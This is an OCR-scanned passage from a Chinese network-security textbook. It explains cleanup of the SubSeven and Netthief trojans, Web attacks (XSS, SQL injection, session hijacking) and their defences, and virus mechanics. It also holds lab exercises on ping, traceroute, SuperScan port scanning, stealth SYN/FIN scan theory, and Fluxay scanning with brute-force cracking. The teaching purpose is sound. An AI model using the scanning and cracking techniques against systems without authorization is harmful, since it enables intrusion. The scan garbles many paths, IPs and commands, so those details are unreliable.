示 将 这 些 文件 恢复 即 可 。 如 果 是 开机 时 自动 运行 的 第 三 方 软件 如 realplay. exe, QQ 等 被 捆 
绑 上 了 ,就 把 这 些 文件 删除 ,重新 安装 。 

2) SubSeven 

SubSeven 的 功能 比 起 大 名 易 易 的 BO2K 可 以 说 有 过 之 而 无 不 及 。 最 新 版 为 2. 2( 默 认 
连接 端口 为 27 374) ,服务 端 只 有 54. 5KB, 很 容易 被 拥 绑 到 其 他 软件 而 不 被 发 现 , 最 新 版 的 
金山 毒霸 等 杀毒 软件 查 不 到 它 。 服 务 器 端 程序 server. exe. 客户 端 程序 subseven. exe, 
SubSeven 服务 端 被 执行 后 ,变化 多 端 ,每 次 启动 的 进程 名 都 会 发 生变 化 ,因此 查 之 很 难 。 

清除 方法 如 下 。 

(1) 打开 注册 表 Regedit, 单 击 至 HKEY_ LOCAL _ MACHINE \ SOFTWARE \ 
MicrosoftN Windows NCurrentVersionN Run 和 RunService 下 ,如果 有 加 载 文 件 ,就 删除 右边 
的 项 目 : Jnd — “c:\windows VsystemV +*+”, E: 加 载 器 和 文件 名 是 随意 改变 的 。 

(2) 打开 win. ini 文 件 , 检 查 “run 二 ”后 有 没有 加 上 某 个 可 执行 文件 名 ,如 有 则 删除 之 。 
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(3) 打开 system. ini X fF. f Zr "shell = explorer. exe” 后 有 没有 跟 某 个 文件 ,如 有 则 将 
CMR. 

(4) 重新 启动 Windows, 删 除 相 对 应 的 木马 程序 ,一 般 在 C:\Windows\System F. 

3) Netthief 

网 络 神偷 又 名 Netthief, 是 第 一 个 反弹 端口 型 木马 。 与 一 般 的 木马 相反 ,反弹 端口 型 木 
马 的 服务 端 (被 控制 端 ) 使 用 主动 端口 ,客户 端 (控制 端 使 用 被 动 端口 。 为 了 隐蔽 起 见 ,客户 
端的 监听 端口 一 般 开 在 80, 这 样 ,即使 用 户 使 用 端口 扫描 软件 检查 自己 的 端口 ,发 现 的 也 是 
类 似 *“TCP 服务 端的 IP 地 址 : 1026 客户 端的 IP 地 址 : 80 ESTABLISHED” 的 情况 f (tif 
忽 一 点 就 会 以 为 自己 在 浏览 网 页 。 

清除 方法 如 下 。 

CD 网 络 神偷 会 在 注册 表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ 
WindowsNCurrentVersionV Run F ££ v & fff “internet” , 其 值 为 “internet. exe/s”, 将 键 值 
删除 。 

(2) 删除 其 自 启动 程序 C:\Windows\System\Internet. exe, 


3.3.5 ”Web 攻击 


Internet 很 多 站 点 都 存在 易 受 攻击 的 漏洞 。 仅 仅 通过 IPSec 阻止 对 端口 的 访问 、 给 系 
统 打 上 最 新 的 补丁 并 不 能 完全 阻挡 黑客 的 攻击 。 除 了 强化 网 络 系统 本 身 的 安全 外 ,还 要 依 
W Web 应 用 程序 开发 者 来 加 强 Web 安全 。 以 下 列举 几 种 最 常见 Web 攻击 的 手段 和 防范 
方法 。 

1. 跨 站 脚本 攻击 

跨 站 脚本 (Cross Site Scripting. XSS) 攻 击 是 指 恶 意 攻 击 者 往 Web 页 面 里 插入 恶意 
HTML 代码 , 当 用 户 浏览 该 页 时 ,在 入 其 中 Web 里 面 的 HTML 代码 会 被 执行 ,从 而 达到 恶 
意 用 户 的 特殊 目的 。 

通常 跨 站 脚本 被 称 为 XSS, 这 是 为 了 与 样式 表 CSS 进行 区 分 所 形成 的 习惯 ,所 以 当 你 
听 某 人 提 到 CSS 或 者 KSS 安全 漏洞 时 ,通常 指 的 是 跨 站 脚本 攻击 。XSS 属于 被 动 式 的 攻 
击 , 因 为 其 被 动 且 不 好 利用 ,所 以 许多 人 常 忽 略 其 危害 性 。 如 何 防范 KSS 攻击 呢 ? 

(1) 在 Web 浏览 器 上 禁用 JavaScript 和 ActiveX 脚本 。 

(2) 要 仔细 审核 代码 ,对 提交 输入 数据 进行 有 效 检查 ,如 “二 ”和 “二 ”, 可 以 把 “二” 二 ” 
转换 为 < 、>。 

2. SQL 注入 攻击 

SQL 注入 攻击 是 黑客 对 数据 库 进行 攻击 的 常用 手段 之 一 。SQL 注入 是 从 正常 的 
WWW 端口 访问 ,而 且 表 面 看 起 来 跟 一 般 的 Web 页 面 访问 没什么 区 别 , 所 以 目前 市 面 的 防 
火 墙 都 不 会 对 SQL 注入 发 出 警报 ,如 果 管 理 员 没有 查看 IIS 日 志 的 习惯 ,可 能 被 入 侵 很 长 
时 间 都 不 会 发 觉 。 但 是 ,SQL 注入 的 手法 相当 灵活 ,在 注入 的 时 候 会 碰 到 很 多 意外 的 情况 ， 
需要 构造 巧妙 的 SQL 语句 ,从 而 成 功 获 取 想 要 的 数据 。 

结构 化 查询 语言 SQL 是 一 种 用 来 和 数据 库 交 互 的 文本 语言 ,SQL Injection 就 是 利用 
某 些 数据 库 的 外 部 接口 把 用 户 数 据 插入 到 实际 的 数据 库 操作 语言 当中 ,从 而 达到 入 侵 数 据 
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库 乃 至 操作 系统 的 目的 。 它 的 产生 主要 是 由 于 程序 对 用 户 输入 的 数据 没有 进行 细致 的 过 
滤 , 导 致 非法 数据 的 导入 查询 。 

SQL 注入 攻击 主要 是 通过 构建 特殊 的 输入 ,这 些 输入 往往 是 SQL 语法 中 的 一 些 组 合 ， 
这 些 输入 将 作为 参数 传人 Web 应 用 程序 ,通过 执行 SQL 语句 而 执行 了 入 侵 者 想 要 的 操作 。 
或 者 确切 地 说 ,SQL 注入 式 攻 击 就 是 攻击 者 把 SQL 命令 插入 到 Web 表单 的 输入 域 或 页 面 
请 求 的 查询 字符 串 ,欺骗 服务 器 执行 恶意 的 SQL 命令 。 在 某 些 表单 中 ,用 户 输入 的 内 容 直 
接 用 来 构造 动态 SQL 命令 ,或 作为 存储 过 程 的 输入 参数 ,这 类 表单 特别 容易 受到 SQL 注入 
式 攻 击 。 

防范 SQL 注入 攻击 的 有 效 方法 : 在 服务 端正 式 处 理 之 前 对 提交 数据 的 合法 性 进行 检 
dr. 封装 客户 端 提交 的 信息 ; 替换 或 删除 敏感 字符 或 字符 串 : 屏蔽 出 错 信息 ; 不 要 用 字符 
串 连接 建立 SQL 查询 ,而 使 用 SQL 变量 ,因为 变量 不 是 可 以 执行 的 脚本 ; 最 小 化 权限 设 
置 ,给 静态 网 页 目录 和 动态 网 页 目录 分 别 设置 不 同 的 权限 ,尽量 不 改写 目录 权限 ; 去 掉 Web 
服务 器 上 默认 的 一 些 危险 命令 ,如 ftp, cmd, wscript 等 ,需要 时 再 复制 到 相应 目录 ; 数据 敏 
感 信息 非常 规 加 密 ,在 程序 中 对 口令 等 敏感 信息 都 是 采用 md5 函数 进行 加 密 , 即 密 文 三 
md5( 明 文 ); 推荐 在 原来 加 密 的 基础 上 增加 一 些 非常 规 的 方式 , 即 在 md5 加 密 的 基础 上 附 
带 一 些 值 ,如 密 文 三 md5(md5( 明 文 ) 十 123 456) 。 

3. 会 话 支持 攻击 

Web 应 用 程序 都 是 通过 Cookie 或 者 Session 来 认证 用 户 。 通 过 将 加 密 的 用 户 认 证 信 
息 存 储 到 Cookie 中 ,或 者 通过 赋予 客户 端的 一 个 Token ,通常 也 就 是 所 说 的 SessionId 来 在 
服务 器 端 直接 完成 认证 和 取得 用 户 的 身份 信息 ,不管 采用 哪 一 种 方式 ,实际 上 在 HTTP 协 
议 里 都 是 通过 Cookie 来 实现 的 ,不 同 的 是 Cookie 可 以 比较 长 期 地 存储 在 客户 端 上 ,而 
Session 往往 在 会 话 结束 之 后 服务 器 监视 会 话 不 处 于 活动 状态 而 予以 销毁 。 

对 于 Web 应 用 程序 来 讲 , 为 了 安全 ,服务 器 应 该 将 Cookie 和 客户 端 绑 定 , 璧 如 将 客户 
端的 加 密 IP 也 存储 到 Cookie 里 ,如 果 发 现 IP 发 生变 化 就 可 以 认为 是 Cookie 发 生 了 泄露 ， 
应 该 取消 这 个 Cookie, 但 是 这 样 一 来 用 户 体 验 就 非常 不 好 ,所 以 一 般 的 应 用 程序 都 没有 对 
Cookie 做 太 多 的 保护 ,这 就 为 客户 端 身份 窃取 提供 了 可 乘 之 机 。 

对 于 Session 认证 ,在 退出 或 者 关闭 浏览 器 而 与 服务 器 的 沟通 结束 之 后 ,Session 在 一 
定时 间 内 也 被 销毁 。 但 是 如 果 程 序 设计 存在 问题 ,可 能 导致 利用 Session 的 机 制 在 服务 器 
上 永久 地 产生 一 个 后 门 (在 某 些 设计 不 严 的 程序 里 ,可 能 修改 口令 也 不 能 消除 掉 这 种 后 门 )， 
这 里 把 它 称 为 一 种 真正 意义 上 的 会 话 (Session) 动 持 攻击 。 

利用 应 用 程序 设计 缺陷 进行 Session 劫持 的 攻击 原理 : 有 效 的 Session ID 值 可 能 失窃 ， 
合法 用 户 再 次 登录 之 后 ,他 获得 新 的 Session ID, 如 果 攻 击 者 用 窃取 到 的 Session ID 连接 服 
务 器 ,这 样 服务 器 上 就 存在 两 个 有 效 的 Session ID 了 。 通 过 研究 应 用 程序 的 Session 超时 
机 制 和 心跳 包机 制 ,就 可 以 长 久 地 使 这 个 Session 有 效 。 即 使 用 户 退 出 应 用 程序 ,销毁 了 他 
的 Session ID, 但 是 仍然 有 一 个 Session ID 被 攻击 者 掌握 。 

防范 会 话 劫持 攻击 的 方法 : 在 设计 认证 的 时 候 就 强行 要 求 客 户 端 必 须 唯 一 且 认 证 信息 
在 多 少 天 之 后 就 过 期 的 机 制 ,但 是 这 样 也 会 和 将 Cookie 和 IP 绑 定 一 样 , 可 能 带 来 不 好 的 用 
户 体验 ,如 何在 设计 的 时 候 意 识 到 这 个 问题 并 且 权 衡 应 用 和 安全 的 平衡 点 才 是 Web 应 用 程 
序 设 计 者 要 考虑 的 难题 。 


102 网 络 安全 技术 (第 2 版) 





3.3.6 计算 机 病毒 


要 认识 病毒 ,就 要 从 病毒 的 机 制 、 分 类 、 结 构 、 传 染 机 制 等 多 个 方面 对 病毒 进行 全 面 的 
T. 

1. 计算 机 病毒 概述 

CD 计算 机 病毒 的 定义 。 计 算 机 病毒 (Computer Virus ) 在 (中 华人 民 共 和 国 计 算 机 信 
息 系统 安 全 保护 条 例 ) 中 明确 定义 :“ 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 
者 破坏 数据 ,影响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 ,” 计 算 机 
病毒 就 像 生物 病毒 一 样 , 有 独特 的 复制 能 力 ,可 以 很 快 地 蔓延 ,而 且 常 常 难以 根除 。 它 们 能 
把 自身 附着 在 各 种 类 型 的 文件 上 。 当 文件 被 复制 或 从 一 个 用 户 传送 到 另 一 个 用 户 时 ,它们 
就 随同 文件 一 起 蔓延 开 来 。 

(2) 计算 机 病毒 的 分 类 。 按 照 计 算 机 病毒 存在 的 介质 进行 分 类 ,可 以 划分 为 网 络 病毒 、 
文件 病毒 .引导 型 病毒 。 网 络 病毒 通过 计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 ,文件 病毒 
感染 计算 机 中 的 文件 (如 COM, EXE, DOC 等 ), 引 导 型 病毒 感染 启动 扇 区 (Boot) 和 硬盘 的 
系统 引导 扇 区 (MBR ) 。 

按照 计算 机 病毒 传染 的 方法 进行 分 类 ,可 分 为 驻 留 型 病毒 和 非 驻 留 型 病毒 。 驻 留 型 病 
毒 感 染 计 算 机 后 ,把 自身 的 内 存 驻 留 部 分 放 在 内 存 中 ,这 一 部 分 程序 挂 接 系统 调用 且 合 并 到 
操作 系统 中 去 ,处 于 激活 状态 ,一 直到 关机 或 重新 启动 。 非 驻 留 型 病毒 在 得 到 机 会 激活 时 并 
不 感染 计算 机 内 存 ,一 些 病毒 在 内 存 中 留 有 小 部 分 ,但 是 并 不 通过 这 一 部 分 进行 传染 ,这 类 
病毒 也 被 划分 为 非 驻 留 型 病毒 。 

(3) 计算 机 病毒 的 结构 。 由 于 计算 机 病毒 是 一 种 特殊 程序 ,其 结构 决定 了 病毒 的 传染 
能 力 和 破坏 能 力 。 计 算 机 病毒 程序 主要 包括 三 大 部 分 : 一 是 传染 部 分 (传染 模块 ), 是 病毒 
程序 的 一 个 重要 组 成 部 分 , 它 负 责 病毒 的 传染 和 扩散 ; 二 是 表现 和 破坏 部 分 (表现 模块 或 破 
坏 模块 ) ,是 病毒 程序 中 最 关键 的 部 分 , 它 负 责 病毒 的 破坏 工作 ; 三 是 触发 部 分 (触发 模块 )， 
病毒 的 触发 条 件 是 预先 由 病毒 编者 设置 的 ,触发 程序 判断 触发 条 件 是 否 满足 ,并 根据 判断 结 
果 来 控制 病毒 的 传染 和 破坏 动作 。 

2. 计算 机 病毒 的 传染 机 制 

CD 计算 机 病毒 的 传染 方式 。 传 染 是 指 计 算 机 病毒 由 一 个 载体 传播 到 另 一 个 载体 ,由 
一 个 系统 进入 另 一 个 系统 的 过 程 。 这 种 载体 一 般 为 磁盘 或 磁带 , 它 是 计算 机 病毒 赖 以 生存 
和 进行 传染 的 介质 。 但 是 ,只 有 载体 还 不 足以 使 病毒 得 到 传播 。 促 成 病毒 的 传染 还 有 一 个 
先决 条 件 ,可 分 为 两 种 情况 ,或 者 叫做 两 种 方式 。 

其 中 一 种 情况 是 ,用 户 在 进行 复制 磁盘 或 文件 时 ,把 一 个 病毒 由 一 个 载体 复制 到 另 一 个 
载体 上 。 或 者 是 通过 网 络 上 的 信息 传递 ,把 一 个 病毒 程序 从 一 方 传递 到 另 一 方 。 这 种 传染 
方式 叫做 计算 机 病毒 的 被 动 传染 。 另 一 种 情况 是 ,计算 机 病毒 是 以 计算 机 系统 的 运行 以 及 
病毒 程序 处 于 激活 状态 为 先决 条 件 。 在 病毒 处 于 激活 的 状态 下 ,只 要 传染 条 件 满足 ,病毒 程 
序 能 主动 地 把 病毒 自身 传染 给 另 一 个 载体 或 男 一 个 系统 。 这 种 传染 方式 叫做 计算 机 病毒 的 
主动 传染 。 

(2) 计算 机 病毒 的 传染 过 程 。 对 于 病毒 的 被 动 传染 而 言 , 其 传染 过 程 是 随 着 复制 磁盘 
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或 文件 工作 的 进行 而 进行 的 ,而 对 于 计算 机 病毒 的 主动 传染 而 言 ,其 传染 过 程 是 这 样 的 : 在 
系统 运行 时 ,病毒 通过 病毒 载体 即 系统 的 外 存储 器 进入 系统 的 内 存储 器 ( 即 常 驻 内 存 ) ,并 在 
系统 内 存 中 监视 系统 的 运行 。 在 病毒 引导 模块 将 病毒 传染 模块 驻 留 内 存 的 过 程 中 ,通常 还 
要 修改 系统 中 断 向 量 入 口 地 址 (如 INT 13H sk INT 21H) ,使 该 中 断 向 量 指向 病毒 程序 传 
染 模块 。 这 样 ,一 旦 系统 执行 磁盘 读 写 操作 或 系统 功能 调用 ,病毒 传染 模块 就 被 激活 ,传染 
模块 在 判断 传染 条 件 满足 的 条 件 下 ,利用 系统 INT 13H 读 写 磁盘 中 断 把 病毒 自身 传染 给 被 
读 写 的 磁盘 或 被 加 载 的 程序 ,也 就 是 实施 病毒 的 传染 ,然后 再 转移 到 原 中 断 服务 程序 执行 原 
有 的 操作 。 

3. 计算 机 病毒 的 防范 

有 规律 地 备份 系统 关键 数据 ; 制作 应 急 盘 ; 提高 对 光盘 的 警觉 ; 限制 使 用 您 的 计算 机 
的 人 的 数量 ; 使 用 360 安全 卫士 系列 软件 。 





习 题 3 


334 什么 是 因特网 上 的 踩点 ? 都 有 哪些 踩点 技巧 ? 

3-2 ”什么 是 端口 扫描 ? 都 有 哪些 扫描 技术 ? 

33 ”网络 踩点 与 网 络 扫描 有 什么 区 别 ? 

3-4 Windows 系统 有 哪些 查 点 方法 ? 

3-5 ”如 何 利用 工具 获取 Windows 系统 System 账户 的 权限 ? 
3-6 Windows 系统 有 哪些 创建 后 门 工 具 ? 

37 有 哪些 拒绝 服务 的 攻击 方法 ? 

3-8 缓冲 区 溢出 攻击 的 基本 原理 是 什么 ? 

39 木马 系统 各 部 分 的 作用 是 什么 ? 


实 训 3.1 Ping .Tracert 和 Sam Spade 网 络 探测 
【 实 训 目的 】 


熟练 掌握 Ping、Tracert 和 Sam Spade 这 3 种 扫描 工具 。 
【 实 训 环境 】 


(1) 局 域 网 。 
(2) 连接 到 Internet。 
(3) 实 训 软件 。 


【 实 训 内 容 】 


1. Ping 
Ping 目标 主机 是 否 存活 ,如 图 3-15 所 示 。 











C:\>ping 192.168.1.181 


Pinging 192.168.1.101 with 32 bytes of data: 


Reply from 192.168.1.101: bytes=32 time<ims 
Reply from 192.168.1.181: bytes-32 time<lms 
Reply from 192.168.1.181: bytes-32 time<1ns 
Reply from 192.168.1.181: bytes-32 tineins 


Ping statistics for 192.168.1.101: 

Packet: Sent 4. Received = 4, Lost = 8 <0x loss), 
Approximate round trip times in nilli-seconds: 

Minimum = Gns, Maximum = Øns, Average = Ans 




















图 3-15 Ping 目标 主机 


2. Tracert 


Tracert 记录 到 达 目 标 主机 的 路 径 , 如 区 





3-16 所 示 
命令 提示 符 


IC: Ytracert wwu.hacz.edu.cn 


Tracing route to www.hacz.edu.cn [210.42.224.11] 
lover a maximum of 30 ho 





192.168.1.1 
1.193.56.1 
69.123.85.222_broad.zz.ha.dunamic.163data.com.cn| 


161.123.85.222.broad.zz.ha.dunamic.163data.com.c 


202.97.48.201 
202.97.35.69 
202.97.50.174 
Request timed out. 
202.127.216.201 
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bjwh4.cernet.net [292.112.46.65] 
202.112.61.50 
282.112.38.30 
218.43.146.37 
218.43.145.242 
222.21.219.18 
Request timed 
Request timed 
Request timed 
Request timed 
Request timed 
Request tined 
Request timed 
Request timed 
Request timed 
Request timed 
Request timed 
Request timed 


3833383383 
3 


z 


8 à 9 à 


X X Xx X X X x x xx 


Trace complete. 


c: 





A 3-16 Tracert 记录 路 径 
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3. Sam Spade 


Sam Spade 记录 到 达 目 标 主 机 的 路 径 , 如 图 3-17 所 示 。 


*Spade — [Fast traceroute www.hacz.edu.cn, finished] 


fr Eile Edit View Window Basics Tools Help 





[sese hacz.edu.cn -|>| € 








[i0 ij @fwhois.geektools.com -| f 
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202. 
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.123.69 
.123.169 
.48.221 
-35.221 
.50.158 
sponse 
.216.20 
36.253 
.36.249 
52. 2657 
.46.65 
.61.50 
.53.214 


.43. 146.37 
. 43.145.242 


Oms 
21ms 
21ms 
24ms 
42ms 
60ms 
57ms 

1 220ms 
77ns 
78ms 
Bms 
73ms 


75ms 
81ms 
76ms 
91ms 


Üms 
22ms 
21ms 
24ms 
44ms 
60ms 
57ms 

218ms 
77ns 
76ms 
BOms 
75ms 


77ms 


B Fast traceroute www.hacz.edu.cn 
Trace www.hac: du.cn (210.42.224.11) ... 
192. 
1.193.56.1 
222. 
222. 
202.9 

6 202.9 
202.9 


Oms 
70ms 
24ms 
24ms 
43ns 
60ms 
58ns 


217ms 
75ms 
76ns 
81ms 
74ms 
76ns 
76ns 
82ns 


91ms 


(pending) 
(pending) 
(pending) 
(pending) 
(pending) 
(pending) 
(pending) 


(pending) 
(pending) 
(pending) 
(pending) 
(pending) 
(pending) 
(pending) 
(pending) 
(pending) 
(pending) 





[For Kalp, press FI 


图 3-17 Sam Spade 记录 路 径 





实 训 3. 2  SuperScan 网 络 扫 描 


【 实 训 目的 】 





(1) 熟悉 端口 扫描 的 原理 ; 通过 练习 使 用 网 络 端口 扫描 器 ,了 解 目标 主机 开放 的 端口 
和 服务 程序 ,从 而 获取 系统 的 有 用 信息 ,发 现 网 络 系统 的 安全 漏洞 。 
(2) 掌握 在 Windows F ,使 用 SuperScan 进行 网 络 端口 扫描 的 方法 。 


【 实 训 环境 】 


CD 局 域 网 环境 ,2 一 3 台 Windows Server 2008 服务 器 ,一 台 客 户 机 ,开放 服务 。 


(2) SuperScan 是 对 目标 主机 的 安全 性 弱点 进行 扫描 检测 的 工具 软件 。 它 具有 数据 分 
析 功 能 ,通过 对 端口 的 扫描 分 析 ,可 以 发 现 目标 主机 开放 的 端口 和 所 提供 的 服务 ,以 及 相应 


服务 软件 版 本 和 这 些 服务 软件 的 安全 漏洞 ,从 而 能 及 时 了 解 目标 主机 存在 的 安全 隐患 。 


(3) 扫描 工具 根据 作用 环境 的 不 同 , 可 分 为 两 种 类 型 , 即 网 络 漏洞 扫描 工具 和 主机 漏洞 


扫描 工具 。 
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CD 主机 漏洞 扫描 工具 是 指 在 本 机 运行 的 扫描 工具 ,以 期 检测 本 地 系统 存在 的 安全 
漏洞 。 

© 网 络 漏洞 扫描 工具 是 指 通过 网 络 检测 远程 目标 网 络 和 主机 系统 存在 漏洞 的 扫描 
工具 。 


【 实 训 内 容 】 


1. SuperScan 


SuperScan 系统 界面 如 图 3-18 所 示 。 





“= SuperScan 4.0 


扫描 “| 主机 和 服务 扫描 设置 | uem] 工具 “| Windows F| XF | 













TIP 地址 
Hoyt | [ma m 结束 IP (— ARE 
aex . . . . 清除 所 有 
sm X| - d ERR 


从 立 件 读 职 TP 地 址 > | 




















t pa par ELI 0 


[Ready 4 














3-18  SuperScan 系统 界面 


2. SuperScan 对 本 地 主机 进行 主机 名 解析 和 端口 扫描 
TCP 数据 包 首部 结构 如 图 3-19 所 示 。 









































源 端口 目标 端口 
序号 
确认 序号 
头 长 度 | 保留 dURG [ack | PSH | esr [svn | Ex pari 
校 验 和 紧急 指针 
有 6 个 标志 位 











图 3-19 TCP 数据 包 结 构 
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(D SYN 用 来 建立 连接 。 

(2) ACK 为 确认 标志 位 。 例 如 , 当 SYN=1,ACK=0 表示 请 求 连接 的 数据 包 ; 当 
SYN=1,ACK=1 表示 接受 连接 的 数据 包 。 

(3) FIN 表示 发 送 端 已 经 没有 数据 可 传 了 ,希望 释放 连接 。 

(4) RST 位 用 于 复位 错误 的 连接 ,例如 收 到 的 一 个 数据 分 段 不 属于 该 主机 的 任何 一 个 
连接 , 则 向 远 端 计算 机 发 送 一 个 RST=1 的 复位 数据 包 ,拒绝 连接 请 求 。 

(5) TCP SYN 扫描 。 本 地 主机 向 目标 主机 发 送 SY N 数据 段 , 如 果 远 端 目标 主机 端口 
开放 , 则 回应 SYN==1、ACK==1, 此 时 本 地 主机 发 送 RST 给 目标 主机 ,拒绝 连接 。 如 果 远 端 
目标 主机 端口 未 开放 , 则 会 回应 RST 给 本 地 主机 。 

由 此 可 知 , 根 据 回应 的 数据 段 可 判断 目标 主机 的 端口 是 否 开 放 。 由 于 TCP SYN 扫描 
没有 建立 TCP 正常 连接 ,所 以 降低 了 被 发 现 的 可 能 ,同时 提高 了 扫描 性 能 。 

(6) TCP FIN 扫描 。 本 地 主机 向 目标 主机 发 送 FIN=1, 如 果 远 端 目标 主机 端口 开放 ， 
则 丢弃 此 包 , 不 回应 ; 如 果 远 端 目 标 主机 端口 未 开放 , 则 返回 一 个 RST 包 。FIN 扫描 通过 
发 送 FIN 的 反馈 判断 远 端 目标 主机 的 端口 是 否 开放 。 

由 于 这 种 扫描 方法 没有 涉及 TCP 的 正常 连接 ,所 以 使 扫描 更 隐秘 ,也 称 为 秘密 扫描 。 
这 种 方法 通常 适用 于 UNIX 操作 系统 主机 ,但 有 的 操作 系统 (如 Windows 2003) 不 管 端口 
是 否 打 开 ,都 回复 RST, 这 时 这 种 方法 就 不 适用 了 。 

(7) UDP ICMP 扫描 。 这 种 方法 利用 了 UDP 协议 , 当 向 目标 主机 的 一 个 未 打开 的 
UDP 端口 发 送 一 个 数据 包 时 ,会 返回 一 个 ICMP_PORT_UNREACHABLE 错误 ,这 样 就 
会 发 现 关 闭 的 端口 。 

对 于 两 台 计 算 机 间 的 任 一 个 TCP 连接 ,一 台 计 算 机 的 一 个 LIP 地 址 : 端口 ] 套 接 字 会 和 
另 一 台 计 算 机 的 一 个 LIP 地 址 : 端口 ] 套 接 字 相 对 应 ,彼此 标识 着 源 端 . 目 的 端 上 数据 包 传 输 
的 源 进 程 和 目标 进程 。 这 样 网 络 上 传输 的 数据 包 就 可 以 由 套 接 字 中 的 IP 地 址 和 端口 号 找 
到 需要 传输 的 主机 和 连接 进程 了 。 可 见 ,端口 和 服务 进程 一 一 对 应 ,从 扫描 开放 的 端口 可 以 
判断 计算 机 中 正在 运行 的 服务 进程 。 

TCP/UDP 的 端口 号 在 0 — 65 535 范围 之 内 ,其 中 1024 以 下 的 端口 给 常用 的 网 络 
服务 。 

例如 ,21 端口 为 FTP 服务 ,23 端口 为 TELNET 服务 ,25 端口 为 SMTP 服务 ,80 端口 
H HTTP 服务 ,110 端口 为 POP3 服务 等 。 图 3-20 一 图 3-22 所 示 为 扫描 端口 20 至 端口 80， 
设置 端口 列表 。 

3. SuperScan 综合 集成 工具 对 局 域 网 的 主机 进行 扫描 


对 局 域 网 主机 扫描 界面 如 图 3-23 所 示 。 
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扫描 。 主机 和 服务 扫描 设置 | 扫 指 选项 | TRO rinde: F| £F | 











查找 主机 iv ASER 超时 设置 ms) [2000 

T- iie liis r 

[ 地 址 掩 码 请 求 

r 信息 请 求 
iv UDP 端口 扫描 超时 设置 ms) [2000 
sur po >| nd 扫描 类 型 G Data C Data + ICMP 
结束 端口 eo 

D 使 用 更 考 端口 
从 文件 读 职 端口 > 
清除 所 选 清除 所 有 

F TCP 端口 扫 撕 超时 设置 ms) [4000 





rss o — ud BERE C 直接 连接 G E 
结束 端口 [o 
口 
Axim >| NL 
清除 所 选 | 清除 所 有 


恢复 默认 值 R) 











[oo:i2 — Saved log file live: 1 Cp open: O [UDP open: O — [155/155 done p| 





图 3-20 设置 端口 





扫描 “| 主机 和 服务 扫描 设 置 | 扫描 选项 | 工具 “| Windows ew 关于 | 

IP 地 址 — 
aswe | [mm smi 

F æ x| e a 5 z 192. 168. 1.100 192. 168. 1.254 peys 
# mr X|[ 192 168. 1 -254 


从 文 促 读 取 IP 地 址 ->| 























Live hosts this batch: 2 ^ 
192.169.1.100 
[Unknown] 3 
139,445 
137 
ë ^ 里 
^ 


Performing banner grabs... 
TCP banner grabbing (2 ports) 
UDP banner grabbing (1 ports) 
mg scan resul 
- Scan done - - 








Discovery scan finished: 08/29/11 21:14:34 


pialn| sm 




















[00:27 [Saved log file Live: 2 [TCP open: 2 UDP open: 1 155/155 done 








图 3-21 扫描 端口 
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[J SuperScan Report 画 





SuperScan Report - 08/29/11 21:14:07 








图 3-22 扫描 报告 


























imi | 主机 和 服务 扫描 设置 | 扫描 污 项 工具 |Windows 权 举 | 关于 | 
主机 名 NPWURL lis2 168.1 100 i 
默认 Whois 服 务 器 Phois netvorksolutions. com 
»| 查找 主机 名 /IP Pinging 192.168.1.100 (192.168.1.100) 
>| Ping Response from 192.168.1.100 in 94 ms 
Response from 152.165 .1.100 in 6 ms 
el lonegs Response from 192.168.1.100 in 0 ms 
» | 路由 跟踪 
»| 批量 处 理 . Zone Transfer syntax is domain@DNS_Server_IP e.g. 
[test.com810.1.2.3 
, | MTP WEAD 请 求 
mear ipp Trying Whois lookup... 
2 d [Doing whois 192.168.1.100 8 
» | HITPS GET 请 求 |vhois.networksolutions.com... 
Lh "hois NOTICE AND TERMS OF USZ: You are not authorized to 
access or query our WHOIS 
b | CRSMIC Whois database through the use of high-volume, automated, 
» | ARIN Whois electronic processes. The 
Data in Netvork Solutions' WHOIS database is provided by 
p | RIPE Whois Network Solutions for information 
H purposes only, and to assist persons in obtaining 
p | APHC Yhois information about or related 
|to & domain name registration record. Network Solutions 
does not guarantee its accuracy. 
By submitting a WHOIS query, you agree to abide by the 
Do:14 — Saved loc file 





图 3-23 ”对 局 域 网 主机 扫描 
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实 训 3.3  Fluxay 5.0 综合 扫描 

















【 实 训 目的 】 
掌握 使 用 综合 漏洞 扫描 及 安全 评估 工具 ,加 深 对 各 种 网 络 和 系统 漏洞 的 理解 。 
【 实 训 环境 】 


CD 两 台 或 多 台 运 行 Windows Server 2003 的 计算 机 ,局 域 网 环境 。 
(2) 流光 (Fluxay 5.0) 工 具 软 件 。 


【 实 训 内 容 】 
1. 认识 Fluxay 5.0 综合 扫描 工具 (如 图 3-24 所 示 ) 


5.0] Build 3310 (0M. 


BG nue 主机 1 
Ee 主机 





国 ANERER 1995-2002 AE & 版 权 所 有 ， 


4 


FF 








5 一 一 一 一 一 一 一 == y 
pa a 56 Uu AR | E75 
图 3-24 Fluxay 5.0 综合 扫描 工具 


图 3-24 中 各 部 分 功能 如 下 。 
Xx 1: 暴力 破解 的 设置 区 域 。 
域 2: 控制 台 输 出 。 
域 3: 扫描 出 来 的 典型 漏洞 列表 。 
区 域 4: 扫描 或 者 暴力 破解 成 功 的 用 户 账号 。 
区 域 5; 扫描 或 者 暴力 破解 的 速度 控制 。 
区 域 6: 扫描 或 者 暴力 破解 时 的 状态 显示 。 
区 域 7: 中 止 按钮 。 
区 域 8: 探测 记录 查找 。 

2. 设置 扫描 参数 

选择 “文件 ”1“ 高 级 扫描 向 导 ” 菜 单 命令 ,设置 扫描 参数 ,按照 提示 逐步 单 击 “ 下 一 步 ” 按 
钮 ,如 图 3-25 — Ed 3-29 所 示 。 


Pq > 
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x 小 杞 软件 -【 流 光 5- 0 Build 3310 (0 用 户 ) 
Pa a dc) EEV fO) MO IAV HHW 关于 (A) 
A wasasmswo em 


^ 





































[Y renw coin 








G IFAR O ceno 





加 maqs o cuns 





项 目 另存 为 @) Ctrl+Shi fttS 


是 近 探 一 结 果 





探 副 历 史记 录 





[sme 














导入 记录 
流光 / 流 影 疾 果 分 析 , 
Tlxay Sensor 结果 分 析 , 
B nme o 后 2002 AA TER MA 











主机 








退出 CD) PIS 


AP 单词 w Lui 4 











图 3-25 设置 参数 第 1 步 






































起 始 地 址 : [192 168. 1.100 
结束 地 址 : |192. 168. 1.254 
因 获 取 主机 名 口 PING 检 查 
^ 

[2d rors 

Berr 

Es 

BA nm 

FA Tv eT kd 

T-E 0 >| | 
图 3-26 设置 参数 第 2 步 
CGI Rules x) 
> 共计 [o785] 条 规则 
[inim [zm Ja 
[2 ida NT 
